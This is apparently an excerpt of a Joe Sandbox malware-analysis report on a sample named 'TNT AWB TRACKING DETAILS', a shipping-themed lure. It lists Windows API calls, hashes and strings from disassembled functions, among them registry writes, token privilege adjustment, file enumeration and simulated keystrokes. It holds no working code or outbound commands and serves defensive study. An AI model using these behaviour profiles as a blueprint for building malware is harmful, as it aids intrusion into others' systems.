                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 38d92b8720ab08af85a6d307c478d23a8c42b08b09e627599339fda820c73b4a
                                                    • Instruction ID: 49050b2976fce859fc5af29c5b7151ced1f78994517aa3eac679234df5114a64
                                                    • Opcode Fuzzy Hash: 38d92b8720ab08af85a6d307c478d23a8c42b08b09e627599339fda820c73b4a
                                                    • Instruction Fuzzy Hash: CDE0863690512C5BC72096589C05FEA77DDDB897A0F0441B5FD0CD7204D9A1AD8086D0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                    • Instruction ID: 897095aef67a5c5b2fbec5d8e682bffe018dbb6fc17fe23d83a41badb9833bc9
                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                    • Instruction Fuzzy Hash: 53E092B1504B145BD7388A64D810BA373E1AB05314F00081DF2AA93241EF6278469759
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EFDD42,?,?,00000000), ref: 00EC5C5F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 2fd711cb6716ac44f65f65aa708a9ebc63f8cbd719e83d33e16626d19e8c95a1
                                                    • Instruction ID: 4c4438ed6186f2edbca9ba77cfabd1ea4053da44a36c61f553e3e3ebec5f5a1b
                                                    • Opcode Fuzzy Hash: 2fd711cb6716ac44f65f65aa708a9ebc63f8cbd719e83d33e16626d19e8c95a1
                                                    • Instruction Fuzzy Hash: 02D0C77464020CBFE710DB80DC46FA9777CD745710F100194FD0456290D6B27D549795
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: ec4f32d6e399c870803152b731f38411a0a98911a5688f5f40fbf48e8355e835
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: C9B0927644020C77CE012A82EC02A493B699B45768F408020FB0C2C172A673A6649A89
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00F01DF0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: PathTemp
                                                    • String ID:
                                                    • API String ID: 2920410445-0
                                                    • Opcode ID: c0f72a509fc40afb00c5b9a7dc9e25148fb99e6576ffc8bde7424937fc9975be
                                                    • Instruction ID: 1d520cfbaef433467f3c142b1277b77548bfc9ce1029cb505f659acd37e64519
                                                    • Opcode Fuzzy Hash: c0f72a509fc40afb00c5b9a7dc9e25148fb99e6576ffc8bde7424937fc9975be
                                                    • Instruction Fuzzy Hash: 62C04C7545001D9BD725A754CC95BA8727CBB11701F00409575459109095B01B88EE21
                                                    APIs
                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 00F2D1FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: b68ad69fa596961b9b6017f8d08ff1f8786df8f00437d8f0d900f6d429739537
                                                    • Instruction ID: e14c3532446dbf97b7834f0a6780bb8d09ec23a824c691a4c5a4e4b4cf8a082e
                                                    • Opcode Fuzzy Hash: b68ad69fa596961b9b6017f8d08ff1f8786df8f00437d8f0d900f6d429739537
                                                    • Instruction Fuzzy Hash: 74718E31608301CFD704EF24D591F6AB7E0AF89310F04596DF896AB3A2DB31E946DB52
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F4CB37
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F4CB95
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F4CBD6
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F4CC00
                                                    • SendMessageW.USER32 ref: 00F4CC29
                                                    • _wcsncpy.LIBCMT ref: 00F4CC95
                                                    • GetKeyState.USER32(00000011), ref: 00F4CCB6
                                                    • GetKeyState.USER32(00000009), ref: 00F4CCC3
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F4CCD9
                                                    • GetKeyState.USER32(00000010), ref: 00F4CCE3
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F4CD0C
                                                    • SendMessageW.USER32 ref: 00F4CD33
                                                    • SendMessageW.USER32(?,00001030,?,00F4B348), ref: 00F4CE37
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F4CE4D
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F4CE60
                                                    • SetCapture.USER32(?), ref: 00F4CE69
                                                    • ClientToScreen.USER32(?,?), ref: 00F4CECE
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F4CEDB
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F4CEF5
                                                    • ReleaseCapture.USER32 ref: 00F4CF00
                                                    • GetCursorPos.USER32(?), ref: 00F4CF3A
                                                    • ScreenToClient.USER32(?,?), ref: 00F4CF47
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F4CFA3
                                                    • SendMessageW.USER32 ref: 00F4CFD1
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F4D00E
                                                    • SendMessageW.USER32 ref: 00F4D03D
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F4D05E
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F4D06D
                                                    • GetCursorPos.USER32(?), ref: 00F4D08D
                                                    • ScreenToClient.USER32(?,?), ref: 00F4D09A
                                                    • GetParent.USER32(?), ref: 00F4D0BA
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F4D123
                                                    • SendMessageW.USER32 ref: 00F4D154
                                                    • ClientToScreen.USER32(?,?), ref: 00F4D1B2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F4D1E2
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F4D20C
                                                    • SendMessageW.USER32 ref: 00F4D22F
                                                    • ClientToScreen.USER32(?,?), ref: 00F4D281
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F4D2B5
                                                      • Part of subcall function 00EC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EC25EC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F4D351
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3977979337-4164748364
                                                    • Opcode ID: 3fb02778e89c2e40bdbe634f021269e403853f6b52d74122daf5c114532a6a04
                                                    • Instruction ID: 874e4fb3b88cf87fbcf6dd84c82667be462f894178afdca9dfb8a72b6276c8e6
                                                    • Opcode Fuzzy Hash: 3fb02778e89c2e40bdbe634f021269e403853f6b52d74122daf5c114532a6a04
                                                    • Instruction Fuzzy Hash: AF429B38605245AFD724CF24CC88FAABFE5FF89720F141519FA59972A1C731D844EB92
                                                    APIs
                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F484D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 3850602802-328681919
                                                    • Opcode ID: 0de123a49ee6f22adec653df45c60d8b95741fe11da88da2c876e747078b77e1
                                                    • Instruction ID: f23d88e4b0159691935ae2b3a4ecc0adbe1a171493e80aae35f9694df49f4906
                                                    • Opcode Fuzzy Hash: 0de123a49ee6f22adec653df45c60d8b95741fe11da88da2c876e747078b77e1
                                                    • Instruction Fuzzy Hash: 9412C371900249ABEB259F24CC49FAF7FE4EF45360F104129FD1AEA2E1DB709946EB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memset
                                                    • String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                    • API String ID: 1357608183-3681475764
                                                    • Opcode ID: ffceb2887481c6a558fee7036dcc498c80ffb4285ac9c58c1faac6efdbf50b64
                                                    • Instruction ID: 0cbfb60d2c741a7cb7c98c131b5ebad2be2c520e2aa385211363557b5912a9c6
                                                    • Opcode Fuzzy Hash: ffceb2887481c6a558fee7036dcc498c80ffb4285ac9c58c1faac6efdbf50b64
                                                    • Instruction Fuzzy Hash: AF938075E042199BDB24CF98C881BEDB7B1FF48324F25816AE955AB381E7709DC2DB40
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00EC48DF
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EFD665
                                                    • IsIconic.USER32(?), ref: 00EFD66E
                                                    • ShowWindow.USER32(?,00000009), ref: 00EFD67B
                                                    • SetForegroundWindow.USER32(?), ref: 00EFD685
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EFD69B
                                                    • GetCurrentThreadId.KERNEL32 ref: 00EFD6A2
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EFD6AE
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EFD6BF
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EFD6C7
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EFD6CF
                                                    • SetForegroundWindow.USER32(?), ref: 00EFD6D2
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EFD6E7
                                                    • keybd_event.USER32(00000012,00000000), ref: 00EFD6F2
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EFD6FC
                                                    • keybd_event.USER32(00000012,00000000), ref: 00EFD701
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EFD70A
                                                    • keybd_event.USER32(00000012,00000000), ref: 00EFD70F
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EFD719
                                                    • keybd_event.USER32(00000012,00000000), ref: 00EFD71E
                                                    • SetForegroundWindow.USER32(?), ref: 00EFD721
                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00EFD748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: d4a8986cfb34d488e80fc0640d1be7a2c85b5885f0443d744165f11b2ce200fe
                                                    • Instruction ID: 1011561eae0fa0938c69b3f9d68a97cf75bd3cb510497c00ecd65d25b9ee8b45
                                                    • Opcode Fuzzy Hash: d4a8986cfb34d488e80fc0640d1be7a2c85b5885f0443d744165f11b2ce200fe
                                                    • Instruction Fuzzy Hash: 4F31B275A4031CBBEB202BA18C49F7F3E6DEB55B50F114026FE08FA1D0CAB05810BAA0
                                                    APIs
                                                      • Part of subcall function 00F187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1882B
                                                      • Part of subcall function 00F187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F18858
                                                      • Part of subcall function 00F187E1: GetLastError.KERNEL32 ref: 00F18865
                                                    • _memset.LIBCMT ref: 00F18353
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F183A5
                                                    • CloseHandle.KERNEL32(?), ref: 00F183B6
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F183CD
                                                    • GetProcessWindowStation.USER32 ref: 00F183E6
                                                    • SetProcessWindowStation.USER32(00000000), ref: 00F183F0
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F1840A
                                                      • Part of subcall function 00F181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F18309), ref: 00F181E0
                                                      • Part of subcall function 00F181CB: CloseHandle.KERNEL32(?,?,00F18309), ref: 00F181F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: 098d5aac744df8c7673cf6ce3da99f8e67b5ae075e13879abe885299338434a7
                                                    • Instruction ID: c2494021853422e3e63fb4c9b4501509a1ddc61ab57f3086b7b8097f6280a736
                                                    • Opcode Fuzzy Hash: 098d5aac744df8c7673cf6ce3da99f8e67b5ae075e13879abe885299338434a7
                                                    • Instruction Fuzzy Hash: 03818A71C0020DAFDF119FA4CD45AEE7BB9EF053A4F184069FD14A2161EB358E96EB20
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F2C78D
                                                    • FindClose.KERNEL32(00000000), ref: 00F2C7E1
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2C806
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2C81D
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F2C844
                                                    • __swprintf.LIBCMT ref: 00F2C890
                                                    • __swprintf.LIBCMT ref: 00F2C8D3
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • __swprintf.LIBCMT ref: 00F2C927
                                                      • Part of subcall function 00EE3698: __woutput_l.LIBCMT ref: 00EE36F1
                                                    • __swprintf.LIBCMT ref: 00F2C975
                                                      • Part of subcall function 00EE3698: __flsbuf.LIBCMT ref: 00EE3713
                                                      • Part of subcall function 00EE3698: __flsbuf.LIBCMT ref: 00EE372B
                                                    • __swprintf.LIBCMT ref: 00F2C9C4
                                                    • __swprintf.LIBCMT ref: 00F2CA13
                                                    • __swprintf.LIBCMT ref: 00F2CA62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: 73c7f5cd87d433fec01ce5e0e0fd6330ba340bf2ef9c48e135437d82b42c9008
                                                    • Instruction ID: 5883bae4ff13051b84b5ffb7cc067ba1eeb58e51ec89825ecee51322264e733c
                                                    • Opcode Fuzzy Hash: 73c7f5cd87d433fec01ce5e0e0fd6330ba340bf2ef9c48e135437d82b42c9008
                                                    • Instruction Fuzzy Hash: 18A16EB2404344ABC704EFA4D989EAFB7ECFF94700F40191DF59597192EA35EA09CB62
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F2EFB6
                                                    • _wcscmp.LIBCMT ref: 00F2EFCB
                                                    • _wcscmp.LIBCMT ref: 00F2EFE2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F2EFF4
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00F2F00E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F2F026
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F031
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F2F04D
                                                    • _wcscmp.LIBCMT ref: 00F2F074
                                                    • _wcscmp.LIBCMT ref: 00F2F08B
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2F09D
                                                    • SetCurrentDirectoryW.KERNEL32(00F78920), ref: 00F2F0BB
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F2F0C5
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F0D2
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F0E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: ec7fab876ed973e25b391adfd6efc4e6929ba66d960e40cfb0b26cd3153c394f
                                                    • Instruction ID: 0e9c876e02314dcd3886123a9329c8f7dfbe481bf447f9ef9b0c1e9f677332e8
                                                    • Opcode Fuzzy Hash: ec7fab876ed973e25b391adfd6efc4e6929ba66d960e40cfb0b26cd3153c394f
                                                    • Instruction Fuzzy Hash: 5631D53690122D6BDB14DFB4EC48AEE77BCDF49360F104176E909E3191DB70DA48EA61
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F40953
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F4F910,00000000,?,00000000,?,?), ref: 00F409C1
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F40A09
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F40A92
                                                    • RegCloseKey.ADVAPI32(?), ref: 00F40DB2
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F40DBF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: df4738c7166b64bde1edf1d81f86dc969250b8c08372608bcaf1d72938cfd6ff
                                                    • Instruction ID: b426c387991d31b4d71fc5b3a7d5f1c08fb233dff78ecba46f94e0d2ec248d89
                                                    • Opcode Fuzzy Hash: df4738c7166b64bde1edf1d81f86dc969250b8c08372608bcaf1d72938cfd6ff
                                                    • Instruction Fuzzy Hash: 77029F766046119FCB14DF24C945E2ABBE5FF89720F04845DF98AAB362CB31EC45DB81
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F2F113
                                                    • _wcscmp.LIBCMT ref: 00F2F128
                                                    • _wcscmp.LIBCMT ref: 00F2F13F
                                                      • Part of subcall function 00F24385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F243A0
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F2F16E
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F179
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F2F195
                                                    • _wcscmp.LIBCMT ref: 00F2F1BC
                                                    • _wcscmp.LIBCMT ref: 00F2F1D3
